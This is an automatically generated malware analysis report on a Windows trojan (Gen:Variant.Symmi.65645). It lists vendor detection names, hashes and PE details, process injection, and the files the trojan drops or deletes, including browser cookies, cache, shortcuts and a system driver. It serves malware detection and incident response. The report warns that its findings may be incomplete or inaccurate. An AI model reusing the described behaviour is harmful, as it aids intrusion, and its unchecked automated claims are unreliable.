Gen.Variant.Symmi.65645_f23bb1c179

by malwarelabrobot on May 26th, 2017 in Malware Descriptions.

Gen:Variant.Symmi.65645 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.DownLoader24.57804 (DrWeb), Gen:Variant.Symmi.65645 (B) (Emsisoft), ML.Attribute.HighConfidence (Symantec), Gen:Variant.Symmi.65645 (FSecure), Win32/DH{NYEOA4IcgQ8?} (AVG), Win32:Malware-gen (Avast), Gen:Variant.Symmi.65645 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool, Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: f23bb1c179fd6ccab543d15af98e5eea
SHA1: b2e2ab681c80a206e901536db74c076fe1cdbf9d
SHA256: fb8c18b71473d8dd6e0f594b7b1d4164ca8b40b830984d7ef4df30fbc4d28a3f
SSDeep: 3072:1yK7mGLup8kviDRZ9P1cQIFM/za1Y1untD Lec73kzXm:1yN7VoRj1czS/W1kgtD p7
Size: 160464 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company:
Created at: 2012-09-10 07:32:48
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1024

The Trojan injects its code into the following process(es):

f23bb1c179d6ccab543d15af98e5eea.exe:260

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\mbHtGKAn.dll (12 bytes)
C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (2264 bytes)

The Trojan deletes the following file(s):

C:\Windows\mbHtGKAn.dll (0 bytes)

The process f23bb1c179d6ccab543d15af98e5eea.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Windows\LMJxkS.dll (10 bytes)
C:\Windows\wrhKvXr\yAXHMEya.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Windows\wrhKvXr\hDuVSc.dll (16661 bytes)
C:\Windows\wrhKvXr\lMmgfUJPh.dll (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Windows\System32\14532e\CDClient_EX.sys (117 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Windows\wrhKvXr\lMmgfUJPh.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\AllServices[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\19628 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K3H6JGON.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Windows\LMJxkS.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Windows\wrhKvXr\hDuVSc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\MG_en-us[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9563C38CC53D34D0B1FB8D66675A7E1BBB4A7575 (0 bytes)
C:\Windows\wrhKvXr\yAXHMEya.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Windows\System32\14532e\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GetMDRCDPOSTURL[1].aspx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (0 bytes)
